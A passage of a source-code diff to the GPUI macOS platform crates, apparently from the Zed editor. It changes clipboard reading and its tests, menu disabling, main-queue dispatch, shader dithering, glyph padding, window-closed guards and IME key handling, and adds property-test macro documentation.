Finally, try the various supported image types. for format in ImageFormat::iter() { if let Some(item) = self.read_image(format) { return Some(item); @@ -70,7 +86,6 @@ impl Pasteboard { } } - // If it wasn't a string or a supported image type, give up. 
None } @@ -94,8 +109,26 @@ impl Pasteboard { } } - fn read_string(&self, text_bytes: &[u8]) -> ClipboardItem { + unsafe fn read_string_from_pasteboard(&self) -> Option { unsafe { + let pasteboard_types: id = self.inner.types(); + let string_type: id = ns_string("public.utf8-plain-text"); + + if !msg_send![pasteboard_types, containsObject: string_type] { + return None; + } + + let data = self.inner.dataForType(string_type); + let text_bytes: &[u8] = if data == nil { + return None; + } else if data.bytes().is_null() { + // https://developer.apple.com/documentation/foundation/nsdata/1410616-bytes?language=objc + // "If the length of the NSData object is 0, this property returns nil." + &[] + } else { + slice::from_raw_parts(data.bytes() as *mut u8, data.length() as usize) + }; + let text = String::from_utf8_lossy(text_bytes).to_string(); let metadata = self .data_for_type(self.text_hash_type) @@ -111,9 +144,7 @@ impl Pasteboard { } }); - ClipboardItem { - entries: vec![ClipboardEntry::String(ClipboardString { text, metadata })], - } + Some(ClipboardEntry::String(ClipboardString { text, metadata })) } } @@ -300,12 +331,44 @@ impl UTType { #[cfg(test)] mod tests { - use cocoa::{appkit::NSPasteboardTypeString, foundation::NSData}; + use cocoa::{ + appkit::{NSFilenamesPboardType, NSPasteboard, NSPasteboardTypeString}, + base::{id, nil}, + foundation::{NSArray, NSData}, + }; + use std::ffi::c_void; - use gpui::{ClipboardEntry, ClipboardItem, ClipboardString}; + use gpui::{ClipboardEntry, ClipboardItem, ClipboardString, ImageFormat}; use super::*; + unsafe fn simulate_external_file_copy(pasteboard: &Pasteboard, paths: &[&str]) { + unsafe { + let ns_paths: Vec = paths.iter().map(|p| ns_string(p)).collect(); + let ns_array = NSArray::arrayWithObjects(nil, &ns_paths); + + let mut types = vec![NSFilenamesPboardType]; + types.push(NSPasteboardTypeString); + + let types_array = NSArray::arrayWithObjects(nil, &types); + pasteboard.inner.declareTypes_owner(types_array, nil); + + 
pasteboard + .inner + .setPropertyList_forType(ns_array, NSFilenamesPboardType); + + let joined = paths.join("\n"); + let bytes = NSData::dataWithBytes_length_( + nil, + joined.as_ptr() as *const c_void, + joined.len() as u64, + ); + pasteboard + .inner + .setData_forType(bytes, NSPasteboardTypeString); + } + } + #[test] fn test_string() { let pasteboard = Pasteboard::unique(); @@ -339,4 +402,124 @@ mod tests { Some(ClipboardItem::new_string(text_from_other_app.to_string())) ); } + + #[test] + fn test_read_external_path() { + let pasteboard = Pasteboard::unique(); + + unsafe { + simulate_external_file_copy(&pasteboard, &["/test.txt"]); + } + + let item = pasteboard.read().expect("should read clipboard item"); + + // Test both ExternalPaths and String entries exist + assert_eq!(item.entries.len(), 2); + + // Test first entry is ExternalPaths + match &item.entries[0] { + ClipboardEntry::ExternalPaths(ep) => { + assert_eq!(ep.paths(), &[PathBuf::from("/test.txt")]); + } + other => panic!("expected ExternalPaths, got {:?}", other), + } + + // Test second entry is String + match &item.entries[1] { + ClipboardEntry::String(s) => { + assert_eq!(s.text(), "/test.txt"); + } + other => panic!("expected String, got {:?}", other), + } + } + + #[test] + fn test_read_external_paths_with_spaces() { + let pasteboard = Pasteboard::unique(); + let paths = ["/some file with spaces.txt"]; + + unsafe { + simulate_external_file_copy(&pasteboard, &paths); + } + + let item = pasteboard.read().expect("should read clipboard item"); + + match &item.entries[0] { + ClipboardEntry::ExternalPaths(ep) => { + assert_eq!(ep.paths(), &[PathBuf::from("/some file with spaces.txt")]); + } + other => panic!("expected ExternalPaths, got {:?}", other), + } + } + + #[test] + fn test_read_multiple_external_paths() { + let pasteboard = Pasteboard::unique(); + let paths = ["/file.txt", "/image.png"]; + + unsafe { + simulate_external_file_copy(&pasteboard, &paths); + } + + let item = 
pasteboard.read().expect("should read clipboard item"); + assert_eq!(item.entries.len(), 2); + + // Test both ExternalPaths and String entries exist + match &item.entries[0] { + ClipboardEntry::ExternalPaths(ep) => { + assert_eq!( + ep.paths(), + &[PathBuf::from("/file.txt"), PathBuf::from("/image.png"),] + ); + } + other => panic!("expected ExternalPaths, got {:?}", other), + } + + match &item.entries[1] { + ClipboardEntry::String(s) => { + assert_eq!(s.text(), "/file.txt\n/image.png"); + assert_eq!(s.metadata, None); + } + other => panic!("expected String, got {:?}", other), + } + } + + #[test] + fn test_read_image() { + let pasteboard = Pasteboard::unique(); + + // Smallest valid PNG: 1x1 transparent pixel + let png_bytes: &[u8] = &[ + 0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A, 0x00, 0x00, 0x00, 0x0D, 0x49, 0x48, + 0x44, 0x52, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x08, 0x06, 0x00, 0x00, + 0x00, 0x1F, 0x15, 0xC4, 0x89, 0x00, 0x00, 0x00, 0x0A, 0x49, 0x44, 0x41, 0x54, 0x78, + 0x9C, 0x62, 0x00, 0x00, 0x00, 0x02, 0x00, 0x01, 0xE5, 0x27, 0xDE, 0xFC, 0x00, 0x00, + 0x00, 0x00, 0x49, 0x45, 0x4E, 0x44, 0xAE, 0x42, 0x60, 0x82, + ]; + + unsafe { + let ns_png_type = NSPasteboardTypePNG; + let types_array = NSArray::arrayWithObjects(nil, &[ns_png_type]); + pasteboard.inner.declareTypes_owner(types_array, nil); + + let data = NSData::dataWithBytes_length_( + nil, + png_bytes.as_ptr() as *const c_void, + png_bytes.len() as u64, + ); + pasteboard.inner.setData_forType(data, ns_png_type); + } + + let item = pasteboard.read().expect("should read PNG image"); + + // Test Image entry exists + assert_eq!(item.entries.len(), 1); + match &item.entries[0] { + ClipboardEntry::Image(img) => { + assert_eq!(img.format, ImageFormat::Png); + assert_eq!(img.bytes, png_bytes); + } + other => panic!("expected Image, got {:?}", other), + } + } } diff --git a/crates/gpui_macos/src/platform.rs b/crates/gpui_macos/src/platform.rs index 
c982f6da191f6b657e51238d8b6ac3d11f724149..5bae3cfb6aa73c99038e0017332a046035dc1589 100644 --- a/crates/gpui_macos/src/platform.rs +++ b/crates/gpui_macos/src/platform.rs @@ -7,8 +7,8 @@ use block::ConcreteBlock; use cocoa::{ appkit::{ NSApplication, NSApplicationActivationPolicy::NSApplicationActivationPolicyRegular, - NSEventModifierFlags, NSMenu, NSMenuItem, NSModalResponse, NSOpenPanel, NSSavePanel, - NSVisualEffectState, NSVisualEffectView, NSWindow, + NSControl as _, NSEventModifierFlags, NSMenu, NSMenuItem, NSModalResponse, NSOpenPanel, + NSSavePanel, NSVisualEffectState, NSVisualEffectView, NSWindow, }, base::{BOOL, NO, YES, id, nil, selector}, foundation::{ @@ -24,6 +24,7 @@ use core_foundation::{ string::{CFString, CFStringRef}, }; use ctor::ctor; +use dispatch2::DispatchQueue; use futures::channel::oneshot; use gpui::{ Action, AnyWindowHandle, BackgroundExecutor, ClipboardItem, CursorStyle, ForegroundExecutor, @@ -296,6 +297,7 @@ impl MacPlatform { action, os_action, checked, + disabled, } => { // Note that this is intentionally using earlier bindings, whereas typically // later ones take display precedence. 
See the discussion on @@ -393,13 +395,18 @@ impl MacPlatform { if *checked { item.setState_(NSVisualEffectState::Active); } + item.setEnabled_(if *disabled { NO } else { YES }); let tag = actions.len() as NSInteger; let _: () = msg_send![item, setTag: tag]; actions.push(action.boxed_clone()); item } - MenuItem::Submenu(Menu { name, items }) => { + MenuItem::Submenu(Menu { + name, + items, + disabled, + }) => { let item = NSMenuItem::new(nil).autorelease(); let submenu = NSMenu::new(nil).autorelease(); submenu.setDelegate_(delegate); @@ -407,6 +414,7 @@ impl MacPlatform { submenu.addItem_(Self::create_menu_item(item, delegate, actions, keymap)); } item.setSubmenu_(submenu); + item.setEnabled_(if *disabled { NO } else { YES }); item.setTitle_(ns_string(name)); item } @@ -493,13 +501,11 @@ impl Platform for MacPlatform { // this, we make quitting the application asynchronous so that we aren't holding borrows to // the app state on the stack when we actually terminate the app. - use crate::dispatcher::{dispatch_get_main_queue, dispatch_sys::dispatch_async_f}; - unsafe { - dispatch_async_f(dispatch_get_main_queue(), ptr::null_mut(), Some(quit)); + DispatchQueue::main().exec_async_f(ptr::null_mut(), quit); } - unsafe extern "C" fn quit(_: *mut c_void) { + extern "C" fn quit(_: *mut c_void) { unsafe { let app = NSApplication::sharedApplication(nil); let _: () = msg_send![app, terminate: nil]; @@ -1261,19 +1267,13 @@ extern "C" fn on_thermal_state_change(this: &mut Object, _: Sel, _: id) { // Defer to the next run loop iteration to avoid re-entrant borrows of the App RefCell, // as NSNotificationCenter delivers this notification synchronously and it may fire while // the App is already borrowed (same pattern as quit() above). 
- use crate::dispatcher::{dispatch_get_main_queue, dispatch_sys::dispatch_async_f}; - let platform = unsafe { get_mac_platform(this) }; let platform_ptr = platform as *const MacPlatform as *mut c_void; unsafe { - dispatch_async_f( - dispatch_get_main_queue(), - platform_ptr, - Some(on_thermal_state_change), - ); + DispatchQueue::main().exec_async_f(platform_ptr, on_thermal_state_change); } - unsafe extern "C" fn on_thermal_state_change(context: *mut c_void) { + extern "C" fn on_thermal_state_change(context: *mut c_void) { let platform = unsafe { &*(context as *const MacPlatform) }; let mut lock = platform.0.lock(); if let Some(mut callback) = lock.on_thermal_state_change.take() { @@ -1389,6 +1389,7 @@ unsafe fn ns_url_to_path(url: id) -> Result { #[link(name = "Carbon", kind = "framework")] unsafe extern "C" { pub(super) fn TISCopyCurrentKeyboardLayoutInputSource() -> *mut Object; + pub(super) fn TISCopyCurrentKeyboardInputSource() -> *mut Object; pub(super) fn TISGetInputSourceProperty( inputSource: *mut Object, propertyKey: *const c_void, @@ -1410,6 +1411,9 @@ unsafe extern "C" { pub(super) static kTISPropertyUnicodeKeyLayoutData: CFStringRef; pub(super) static kTISPropertyInputSourceID: CFStringRef; pub(super) static kTISPropertyLocalizedName: CFStringRef; + pub(super) static kTISPropertyInputSourceIsASCIICapable: CFStringRef; + pub(super) static kTISPropertyInputSourceType: CFStringRef; + pub(super) static kTISTypeKeyboardInputMode: CFStringRef; } mod security { diff --git a/crates/gpui_macos/src/shaders.metal b/crates/gpui_macos/src/shaders.metal index 3c6adac3359ac41ee0cc265480dae6e63a2c2136..4dc2d334e1e0929cc2ee7369ecce2f074b919366 100644 --- a/crates/gpui_macos/src/shaders.metal +++ b/crates/gpui_macos/src/shaders.metal @@ -1215,6 +1215,20 @@ float4 fill_color(Background background, break; } } + + // Dither to reduce banding in gradients (especially dark/alpha). + // Triangular-distributed noise breaks up 8-bit quantization steps. 
+ // ±2/255 for RGB (enough for dark-on-dark compositing), + // ±3/255 for alpha (needs more because alpha × dark color = tiny steps). + { + float2 seed = position * 0.6180339887; // golden ratio spread + float r1 = fract(sin(dot(seed, float2(12.9898, 78.233))) * 43758.5453); + float r2 = fract(sin(dot(seed, float2(39.3460, 11.135))) * 24634.6345); + float tri = r1 + r2 - 1.0; // triangular PDF, range [-1, +1] + color.rgb += tri * 2.0 / 255.0; + color.a += tri * 3.0 / 255.0; + } + break; } case 2: { diff --git a/crates/gpui_macos/src/text_system.rs b/crates/gpui_macos/src/text_system.rs index 2511bcf12dc240bf11d2c050579a6c06ebb155ed..d4ffd2514e3ed1a7616cce9bb44cea0b06ab56f3 100644 --- a/crates/gpui_macos/src/text_system.rs +++ b/crates/gpui_macos/src/text_system.rs @@ -53,7 +53,8 @@ use crate::open_type::apply_features_and_fallbacks; #[allow(non_upper_case_globals)] const kCGImageAlphaOnly: u32 = 7; -pub(crate) struct MacTextSystem(RwLock); +/// macOS text system using CoreText for font shaping. +pub struct MacTextSystem(RwLock); #[derive(Clone, PartialEq, Eq, Hash)] struct FontKey { @@ -73,7 +74,8 @@ struct MacTextSystemState { } impl MacTextSystem { - pub(crate) fn new() -> Self { + /// Create a new MacTextSystem. + pub fn new() -> Self { Self(RwLock::new(MacTextSystemState { memory_source: MemSource::empty(), system_source: SystemSource::new(), @@ -359,13 +361,22 @@ impl MacTextSystemState { fn raster_bounds(&self, params: &RenderGlyphParams) -> Result> { let font = &self.fonts[params.font_id.0]; let scale = Transform2F::from_scale(params.scale_factor); - Ok(bounds_from_rect_i(font.raster_bounds( + let mut bounds: Bounds = bounds_from_rect_i(font.raster_bounds( params.glyph_id.0, params.font_size.into(), scale, HintingOptions::None, font_kit::canvas::RasterizationOptions::GrayscaleAa, - )?)) + )?); + + // Add 3% of font size as padding, clamped between 1 and 5 pixels + // to avoid clipping of anti-aliased edges. 
+ let pad = + ((params.font_size.as_f32() * 0.03 * params.scale_factor).ceil() as i32).clamp(1, 5); + bounds.origin.x -= DevicePixels(pad); + bounds.size.width += DevicePixels(pad); + + Ok(bounds) } fn rasterize_glyph( diff --git a/crates/gpui_macos/src/window.rs b/crates/gpui_macos/src/window.rs index 87cd5ee21d5e448ee43b604657ddbe89e705035b..8811a4159a0f539d2bae2c62242a3d5f490686ef 100644 --- a/crates/gpui_macos/src/window.rs +++ b/crates/gpui_macos/src/window.rs @@ -1,7 +1,8 @@ use crate::{ - BoolExt, DisplayLink, MacDisplay, NSRange, NSStringExt, dispatch_get_main_queue, - dispatcher::dispatch_sys::dispatch_async_f, events::platform_input_from_native, ns_string, - renderer, + BoolExt, DisplayLink, MacDisplay, NSRange, NSStringExt, TISCopyCurrentKeyboardInputSource, + TISGetInputSourceProperty, events::platform_input_from_native, + kTISPropertyInputSourceIsASCIICapable, kTISPropertyInputSourceType, kTISTypeKeyboardInputMode, + ns_string, renderer, }; #[cfg(any(test, feature = "test-support"))] use anyhow::Result; @@ -22,6 +23,7 @@ use cocoa::{ NSUserDefaults, }, }; +use dispatch2::DispatchQueue; use gpui::{ AnyWindowHandle, BackgroundExecutor, Bounds, Capslock, ExternalPaths, FileDropEvent, ForegroundExecutor, KeyDownEvent, Keystroke, Modifiers, ModifiersChangedEvent, MouseButton, @@ -34,6 +36,9 @@ use gpui::{ #[cfg(any(test, feature = "test-support"))] use image::RgbaImage; +use core_foundation::base::{CFRelease, CFTypeRef}; +use core_foundation_sys::base::CFEqual; +use core_foundation_sys::number::{CFBooleanGetValue, CFBooleanRef}; use core_graphics::display::{CGDirectDisplayID, CGPoint, CGRect}; use ctor::ctor; use futures::channel::oneshot; @@ -44,6 +49,7 @@ use objc::{ runtime::{BOOL, Class, NO, Object, Protocol, Sel, YES}, sel, sel_impl, }; +use objc2_app_kit::NSBeep; use parking_lot::Mutex; use raw_window_handle as rwh; use smallvec::SmallVec; @@ -55,7 +61,10 @@ use std::{ path::PathBuf, ptr::{self, NonNull}, rc::Rc, - sync::{Arc, Weak}, + sync::{ + Arc, 
Weak, + atomic::{AtomicBool, Ordering}, + }, time::Duration, }; use util::ResultExt; @@ -172,10 +181,22 @@ unsafe fn build_classes() { sel!(mouseExited:), handle_view_event as extern "C" fn(&Object, Sel, id), ); + decl.add_method( + sel!(magnifyWithEvent:), + handle_view_event as extern "C" fn(&Object, Sel, id), + ); decl.add_method( sel!(mouseDragged:), handle_view_event as extern "C" fn(&Object, Sel, id), ); + decl.add_method( + sel!(rightMouseDragged:), + handle_view_event as extern "C" fn(&Object, Sel, id), + ); + decl.add_method( + sel!(otherMouseDragged:), + handle_view_event as extern "C" fn(&Object, Sel, id), + ); decl.add_method( sel!(scrollWheel:), handle_view_event as extern "C" fn(&Object, Sel, id), @@ -436,6 +457,7 @@ struct MacWindowState { select_previous_tab_callback: Option>, toggle_tab_bar_callback: Option>, activated_least_once: bool, + closed: Arc, // The parent window if this window is a sheet (Dialog kind) sheet_parent: Option, } @@ -760,6 +782,7 @@ impl MacWindow { select_previous_tab_callback: None, toggle_tab_bar_callback: None, activated_least_once: false, + closed: Arc::new(AtomicBool::new(false)), sheet_parent: None, }))); @@ -1016,6 +1039,17 @@ impl Drop for MacWindow { } } +/// Calls `f` if the window is not closed. +/// +/// This should be used when spawning foreground tasks interacting with the +/// window, as some messages will end hard faulting if dispatched to no longer +/// valid window handles. 
+fn if_window_not_closed(closed: Arc, f: impl FnOnce()) { + if !closed.load(Ordering::Acquire) { + f(); + } +} + impl PlatformWindow for MacWindow { fn bounds(&self) -> Bounds { self.0.as_ref().lock().bounds() @@ -1036,48 +1070,47 @@ impl PlatformWindow for MacWindow { fn resize(&mut self, size: Size) { let this = self.0.lock(); let window = this.native_window; + let closed = this.closed.clone(); this.foreground_executor .spawn(async move { - unsafe { + if_window_not_closed(closed, || unsafe { window.setContentSize_(NSSize { width: size.width.as_f32() as f64, height: size.height.as_f32() as f64, }); - } + }) }) .detach(); } fn merge_all_windows(&self) { let native_window = self.0.lock().native_window; - unsafe extern "C" fn merge_windows_async(context: *mut std::ffi::c_void) { - let native_window = context as id; - let _: () = msg_send![native_window, mergeAllWindows:nil]; + extern "C" fn merge_windows_async(context: *mut std::ffi::c_void) { + unsafe { + let native_window = context as id; + let _: () = msg_send![native_window, mergeAllWindows:nil]; + } } unsafe { - dispatch_async_f( - dispatch_get_main_queue(), - native_window as *mut std::ffi::c_void, - Some(merge_windows_async), - ); + DispatchQueue::main() + .exec_async_f(native_window as *mut std::ffi::c_void, merge_windows_async); } } fn move_tab_to_new_window(&self) { let native_window = self.0.lock().native_window; - unsafe extern "C" fn move_tab_async(context: *mut std::ffi::c_void) { - let native_window = context as id; - let _: () = msg_send![native_window, moveTabToNewWindow:nil]; - let _: () = msg_send![native_window, makeKeyAndOrderFront: nil]; + extern "C" fn move_tab_async(context: *mut std::ffi::c_void) { + unsafe { + let native_window = context as id; + let _: () = msg_send![native_window, moveTabToNewWindow:nil]; + let _: () = msg_send![native_window, makeKeyAndOrderFront: nil]; + } } unsafe { - dispatch_async_f( - dispatch_get_main_queue(), - native_window as *mut std::ffi::c_void, - 
Some(move_tab_async), - ); + DispatchQueue::main() + .exec_async_f(native_window as *mut std::ffi::c_void, move_tab_async); } } @@ -1258,15 +1291,21 @@ impl PlatformWindow for MacWindow { } }); let block = block.copy(); - let native_window = self.0.lock().native_window; - let executor = self.0.lock().foreground_executor.clone(); + let lock = self.0.lock(); + let native_window = lock.native_window; + let closed = lock.closed.clone(); + let executor = lock.foreground_executor.clone(); executor .spawn(async move { - let _: () = msg_send![ - alert, - beginSheetModalForWindow: native_window - completionHandler: block - ]; + if !closed.load(Ordering::Acquire) { + let _: () = msg_send![ + alert, + beginSheetModalForWindow: native_window + completionHandler: block + ]; + } else { + let _: () = msg_send![alert, release]; + } }) .detach(); @@ -1275,12 +1314,16 @@ impl PlatformWindow for MacWindow { } fn activate(&self) { - let window = self.0.lock().native_window; - let executor = self.0.lock().foreground_executor.clone(); + let lock = self.0.lock(); + let window = lock.native_window; + let closed = lock.closed.clone(); + let executor = lock.foreground_executor.clone(); executor .spawn(async move { - unsafe { - let _: () = msg_send![window, makeKeyAndOrderFront: nil]; + if !closed.load(Ordering::Acquire) { + unsafe { + let _: () = msg_send![window, makeKeyAndOrderFront: nil]; + } } }) .detach(); @@ -1418,11 +1461,12 @@ impl PlatformWindow for MacWindow { fn zoom(&self) { let this = self.0.lock(); let window = this.native_window; + let closed = this.closed.clone(); this.foreground_executor .spawn(async move { - unsafe { + if_window_not_closed(closed, || unsafe { window.zoom_(nil); - } + }) }) .detach(); } @@ -1430,11 +1474,12 @@ impl PlatformWindow for MacWindow { fn toggle_fullscreen(&self) { let this = self.0.lock(); let window = this.native_window; + let closed = this.closed.clone(); this.foreground_executor .spawn(async move { - unsafe { + if_window_not_closed(closed, || 
unsafe { window.toggleFullScreen_(nil); - } + }) }) .detach(); } @@ -1575,45 +1620,48 @@ impl PlatformWindow for MacWindow { fn titlebar_double_click(&self) { let this = self.0.lock(); let window = this.native_window; + let closed = this.closed.clone(); this.foreground_executor .spawn(async move { - unsafe { - let defaults: id = NSUserDefaults::standardUserDefaults(); - let domain = ns_string("NSGlobalDomain"); - let key = ns_string("AppleActionOnDoubleClick"); - - let dict: id = msg_send![defaults, persistentDomainForName: domain]; - let action: id = if !dict.is_null() { - msg_send![dict, objectForKey: key] - } else { - nil - }; + if_window_not_closed(closed, || { + unsafe { + let defaults: id = NSUserDefaults::standardUserDefaults(); + let domain = ns_string("NSGlobalDomain"); + let key = ns_string("AppleActionOnDoubleClick"); + + let dict: id = msg_send![defaults, persistentDomainForName: domain]; + let action: id = if !dict.is_null() { + msg_send![dict, objectForKey: key] + } else { + nil + }; - let action_str = if !action.is_null() { - CStr::from_ptr(NSString::UTF8String(action)).to_string_lossy() - } else { - "".into() - }; + let action_str = if !action.is_null() { + CStr::from_ptr(NSString::UTF8String(action)).to_string_lossy() + } else { + "".into() + }; - match action_str.as_ref() { - "None" => { - // "Do Nothing" selected, so do no action - } - "Minimize" => { - window.miniaturize_(nil); - } - "Maximize" => { - window.zoom_(nil); - } - "Fill" => { - // There is no documented API for "Fill" action, so we'll just zoom the window - window.zoom_(nil); - } - _ => { - window.zoom_(nil); + match action_str.as_ref() { + "None" => { + // "Do Nothing" selected, so do no action + } + "Minimize" => { + window.miniaturize_(nil); + } + "Maximize" => { + window.zoom_(nil); + } + "Fill" => { + // There is no documented API for "Fill" action, so we'll just zoom the window + window.zoom_(nil); + } + _ => { + window.zoom_(nil); + } } } - } + }) }) .detach(); } @@ -1629,6 
+1677,10 @@ impl PlatformWindow for MacWindow { } } + fn play_system_bell(&self) { + unsafe { NSBeep() } + } + #[cfg(any(test, feature = "test-support"))] fn render_to_image(&self, scene: &gpui::Scene) -> Result { let mut this = self.0.lock(); @@ -1649,12 +1701,7 @@ impl rwh::HasWindowHandle for MacWindow { impl rwh::HasDisplayHandle for MacWindow { fn display_handle(&self) -> Result, rwh::HandleError> { - // SAFETY: This is a no-op on macOS - unsafe { - Ok(rwh::DisplayHandle::borrow_raw( - rwh::AppKitDisplayHandle::new().into(), - )) - } + Ok(rwh::DisplayHandle::appkit()) } } @@ -1748,6 +1795,45 @@ extern "C" fn handle_key_up(this: &Object, _: Sel, native_event: id) { // - in vim mode `option-4` should go to end of line (same as $) // Japanese (Romaji) layout: // - type `a i left down up enter enter` should create an unmarked text "愛" +// - In vim mode with `jj` bound to `vim::NormalBefore` in insert mode, typing 'j i' with +// Japanese IME should produce "じ" (ji), not "jい" + +/// Returns true if the current keyboard input source is a composition-based IME +/// (e.g. Japanese Hiragana, Korean, Chinese Pinyin) that produces non-ASCII output. +/// +/// This checks two properties: +/// 1. The source type is `kTISTypeKeyboardInputMode` (an IME input mode, not a plain +/// keyboard layout). This excludes non-ASCII layouts like Armenian and Ukrainian +/// that map keys directly without composition. +/// 2. The source is not ASCII-capable, which excludes modes like Japanese Romaji that +/// produce ASCII characters and should allow multi-stroke keybindings like `jj`. 
+unsafe fn is_ime_input_source_active() -> bool { + unsafe { + let source = TISCopyCurrentKeyboardInputSource(); + if source.is_null() { + return false; + } + + let source_type = + TISGetInputSourceProperty(source, kTISPropertyInputSourceType as *const c_void); + let is_input_mode = !source_type.is_null() + && CFEqual( + source_type as CFTypeRef, + kTISTypeKeyboardInputMode as CFTypeRef, + ) != 0; + + let is_ascii = TISGetInputSourceProperty( + source, + kTISPropertyInputSourceIsASCIICapable as *const c_void, + ); + let is_ascii_capable = !is_ascii.is_null() && CFBooleanGetValue(is_ascii as CFBooleanRef); + + CFRelease(source as CFTypeRef); + + is_input_mode && !is_ascii_capable + } +} + extern "C" fn handle_key_event(this: &Object, native_event: id, key_equivalent: bool) -> BOOL { let window_state = unsafe { get_window_state(this) }; let mut lock = window_state.as_ref().lock(); @@ -1797,10 +1883,34 @@ extern "C" fn handle_key_event(this: &Object, native_event: id, key_equivalent: // may need them even if there is no marked text; // however we skip keys with control or the input handler adds control-characters to the buffer. // and keys with function, as the input handler swallows them. + // and keys with platform (Cmd), so that Cmd+key events (e.g. Cmd+`) are not + // consumed by the IME on non-QWERTY / dead-key layouts. + // We also send printable keys to the IME first when an IME input source (e.g. Japanese, + // Korean, Chinese) is active and the input handler accepts text input. This prevents + // multi-stroke keybindings like `jj` from intercepting keys that the IME should compose + // (e.g. typing 'ji' should produce 'じ', not 'jい'). If the IME doesn't handle the key, + // it calls `doCommandBySelector:` which routes it back to keybinding matching. 
+ let is_ime_printable_key = !is_composing + && key_down_event + .keystroke + .key_char + .as_ref() + .is_some_and(|key_char| key_char.chars().all(|c| !c.is_control())) + && !key_down_event.keystroke.modifiers.control + && !key_down_event.keystroke.modifiers.function + && !key_down_event.keystroke.modifiers.platform + && unsafe { is_ime_input_source_active() } + && with_input_handler(this, |input_handler| { + input_handler.query_prefers_ime_for_printable_keys() + }) + .unwrap_or(false); + if is_composing + || is_ime_printable_key || (key_down_event.keystroke.key_char.is_none() && !key_down_event.keystroke.modifiers.control - && !key_down_event.keystroke.modifiers.function) + && !key_down_event.keystroke.modifiers.function + && !key_down_event.keystroke.modifiers.platform) { { let mut lock = window_state.as_ref().lock(); @@ -2065,11 +2175,13 @@ fn update_window_scale_factor(window_state: &Arc>) { let scale_factor = lock.scale_factor(); let size = lock.content_size(); let drawable_size = size.to_device_pixels(scale_factor); - unsafe { - let _: () = msg_send![ - lock.renderer.layer(), - setContentsScale: scale_factor as f64 - ]; + if let Some(layer) = lock.renderer.layer() { + unsafe { + let _: () = msg_send![ + layer, + setContentsScale: scale_factor as f64 + ]; + } } lock.renderer.update_drawable_size(drawable_size); @@ -2106,10 +2218,12 @@ extern "C" fn window_did_change_key_status(this: &Object, selector: Sel, _: id) // in theory, we're not supposed to invoke this method manually but it balances out // the spurious `becomeKeyWindow` event and helps us work around that bug. 
if selector == sel!(windowDidBecomeKey:) && !is_active { + let native_window = lock.native_window; + drop(lock); unsafe { - let _: () = msg_send![lock.native_window, resignKeyWindow]; - return; + let _: () = msg_send![native_window, resignKeyWindow]; } + return; } let executor = lock.foreground_executor.clone(); @@ -2176,6 +2290,7 @@ extern "C" fn close_window(this: &Object, _: Sel) { let close_callback = { let window_state = get_window_state(this); let mut lock = window_state.as_ref().lock(); + lock.closed.store(true, Ordering::Release); lock.close_callback.take() }; @@ -2252,7 +2367,7 @@ extern "C" fn display_layer(this: &Object, _: Sel, _: id) { } } -unsafe extern "C" fn step(view: *mut c_void) { +extern "C" fn step(view: *mut c_void) { let view = view as id; let window_state = unsafe { get_window_state(&*view) }; let mut lock = window_state.lock(); diff --git a/crates/gpui_macros/Cargo.toml b/crates/gpui_macros/Cargo.toml index 2ee8da52fb7a013cefdd5fe79520a5d18f1e5b3f..513dd61d7b1da83aae2ca4779fb187aece3d7278 100644 --- a/crates/gpui_macros/Cargo.toml +++ b/crates/gpui_macros/Cargo.toml @@ -24,4 +24,4 @@ quote.workspace = true syn.workspace = true [dev-dependencies] -gpui = { workspace = true, features = ["inspector"] } +gpui = { workspace = true, features = ["inspector"] } \ No newline at end of file diff --git a/crates/gpui_macros/src/gpui_macros.rs b/crates/gpui_macros/src/gpui_macros.rs index 0f1365be77ec221d9061f588f84ff6acab3c32ab..e30c85e6edbee8b5307a5139c00a222e9a83bc55 100644 --- a/crates/gpui_macros/src/gpui_macros.rs +++ b/crates/gpui_macros/src/gpui_macros.rs @@ -3,6 +3,7 @@ mod derive_app_context; mod derive_into_element; mod derive_render; mod derive_visual_context; +mod property_test; mod register_action; mod styles; mod test; @@ -188,6 +189,79 @@ pub fn test(args: TokenStream, function: TokenStream) -> TokenStream { test::test(args, function) } +/// A variant of `#[gpui::test]` that supports property-based testing. 
+/// +/// A property test, much like a standard GPUI randomized test, allows testing +/// claims of the form "for any possible X, Y should hold". For example: +/// ``` +/// #[gpui::property_test] +/// fn test_arithmetic(x: i32, y: i32) { +/// assert!(x == y || x < y || x > y); +/// } +/// ``` +/// Standard GPUI randomized tests provide you with an instance of `StdRng` to +/// generate random data in a controlled manner. Property-based tests have some +/// advantages, however: +/// - Shrinking - the harness also understands a notion of the "complexity" of a +/// particular value. This allows it to find the "simplest possible value that +/// causes the test to fail". +/// - Ergonomics/clarity - the property-testing harness will automatically +/// generate values, removing the need to fill the test body with generation +/// logic. +/// - Failure persistence - if a failing seed is identified, it is stored in a +/// file, which can be checked in, and future runs will check these cases before +/// future cases. +/// +/// Property tests work best when all inputs can be generated up-front and kept +/// in a simple data structure. Sometimes, this isn't possible - for example, if +/// a test needs to make a random decision based on the current state of some +/// structure. In this case, a standard GPUI randomized test may be more +/// suitable. +/// +/// ## Customizing random values +/// +/// This macro is based on the [`#[proptest::property_test]`] macro, but handles +/// some of the same GPUI-specific arguments as `#[gpui::test]`. Specifically, +/// `&{mut,} TestAppContext` and `BackgroundExecutor` work as normal. `StdRng` +/// arguments are **explicitly forbidden**, since they break shrinking, and are +/// a common footgun. +/// +/// All other arguments are forwarded to the underlying proptest macro. +/// +/// Note: much of the following is copied from the proptest docs, specifically the +/// [`#[proptest::property_test]`] macro docs. 
+/// +/// Random values of type `T` are generated by a `Strategy` object. +/// Some types have a canonical `Strategy` - these types also implement +/// `Arbitrary`. Parameters to a `#[gpui::property_test]`, by default, use a +/// type's `Arbitrary` implementation. If you'd like to provide a custom +/// strategy, you can use `#[strategy = ...]` on the argument: +/// ``` +/// #[gpui::property_test] +/// fn int_test(#[strategy = 1..10] x: i32, #[strategy = "[a-zA-Z0-9]{20}"] s: String) { +/// assert!(s.len() > (x as usize)); +/// } +/// ``` +/// +/// For more information on writing custom `Strategy` and `Arbitrary` +/// implementations, see [the proptest book][book], and the [`Strategy`] trait. +/// +/// ## Scheduler +/// +/// Similar to `#[gpui::test]`, this macro will choose random seeds for the test +/// scheduler. It uses `.no_shrink()` to tell proptest that all seeds are +/// roughly equivalent in terms of "complexity". If `$SEED` is set, it will +/// affect **ONLY** the seed passed to the scheduler. To control other values, +/// use custom `Strategy`s. +/// +/// [`#[proptest::property_test]`]: https://docs.rs/proptest/latest/proptest/attr.property_test.html +/// [book]: https://proptest-rs.github.io/proptest/intro.html +/// [`Strategy`]: 